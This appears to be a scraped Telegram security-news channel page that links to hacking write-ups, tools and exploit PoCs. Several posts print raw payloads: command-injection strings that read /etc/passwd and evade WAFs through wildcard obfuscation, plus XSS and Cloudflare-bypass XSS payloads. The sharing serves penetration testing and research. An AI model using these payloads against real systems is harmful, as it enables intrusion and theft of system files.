Information Security
@sec_nerd_en
408
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
408 subscribers
Information Security
Information Security
Information Security
https://github.com/aaronhnatiw/race-the-web
GitHub
GitHub - TheHackerDev/race-the-web: Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous…
Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline. - GitHub - TheHackerDev/race-the-web: Tests for race conditions in web app...
Information Security
#WAF
#ModSecurity
#RCE
#Payloads
Detection
#Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
Information Security
https://www.shelliscoming.com/2019/11/retro-shellcoding-for-current-threats.html
Shelliscoming
Retro shellcoding for current threats: rebinding sockets in Windows
In previous posts we saw two techniques to bypass firewalls through custom stagers to locate and reuse the connection socket; on the one ha...
Information Security
https://www.darknet.org.uk/2019/11/sooty-soc-analyst-all-in-one-cli-tool/
Darknet - Hacking Tools, Hacker News & Cyber Security
Sooty - SOC Analyst All-In-One CLI Tool
Sooty is a tool developed with the task of aiding a SOC analyst to automate parts of their workflow and speed up their process.
Information Security
https://securityonline.info/bypass-xss-filter
Penetration Testing
Everythings do to bypass XSS filter
Bypass XSS filter methodologies, techniques, tips. Cross Site Scripting (XSS) is a Web application attack in the data output to the page
Information Security
https://osandamalith.com/2018/02/11/mysql-udf-exploitation/
🔐
Blog of Osanda
MySQL UDF Exploitation |
🔐
Blog of Osanda
Overview In the real world, while I was pentesting a financial institute I came across a scenario where they had an internal intranet and it was using MySQL 5.7 64-bit as the backend database techn…
Information Security
https://twitter.com/PortSwiggerRes/status/1190187441124257792?s=19
Twitter
PortSwigger Research
Firefox mXSS <img id="<img src=1 onerror=alert(1)>"> based on @SecurityMB's work. Is triggered when you use something like template to read the innerHTML.
Information Security
https://medium.com/@D0rkerDevil/how-i-tookover-a-ldap-server-703209161001
Medium
How I Tookover a ldap server.
Intro
Information Security
https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
Information Security
https://0xrick.github.io/hack-the-box/haystack/
Information Security
https://github.com/teknogeek/ssrf-sheriff
GitHub
GitHub - teknogeek/ssrf-sheriff: A simple SSRF-testing sheriff written in Go
A simple SSRF-testing sheriff written in Go. Contribute to teknogeek/ssrf-sheriff development by creating an account on GitHub.
Information Security
XSS Payload:
<</div>script</div>>alert()<</div>/script</div>>
Information Security
https://blog.bentkowski.info/2018/06/xss-in-google-colaboratory-csp-bypass.html
blog.bentkowski.info
XSS in Google Colaboratory + CSP bypass
In this note, I describe an interesting XSS that I found in February 2018 in one of the Google applications. I won't only show directly wher...
Information Security
https://twitter.com/spyerror/status/1190845842623811587
Twitter
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
cloudflare {`XSS´} «byPASS» payloads. @spyerror
🎯
🥇
$cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
🥈
$cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Information Security
https://h0mbre.github.io/Creating_Win32_ROP_Chains/
The Human Machine Interface
Creating Win32 ROP Chains
Introduction Continuing with the Windows exploit development our next stop is learning how to craft ROP chains. In the context of this blogpost we will be using them to disable DEP and execute shellcode on the stack; however, ROP chains are extremely versatile…
Information Security
https://research.securitum.com/jwt-json-web-token-security/
research.securitum.com
JWT (JSON Web Token) (in)security - research.securitum.com
JWT (JSON Web Token) is a mechanism that is often used in REST APIs it can be found in popular standards, such as OpenID Connect, but we will also encounter it sometimes using OAuth2. It is used both in large companies and smaller organisations. There are…
Information Security
https://github.com/q3k/cve-2019-5736-poc
Information Security
https://gist.github.com/adamyordan/96da0ad5e72cbc97285f2df340cac43b
CVE-2019-1003000-Jenkins-RCE-POC
Gist
CVE-2019-1003000-Jenkins-RCE-POC
CVE-2019-1003000-Jenkins-RCE-POC. GitHub Gist: instantly share code, notes, and snippets.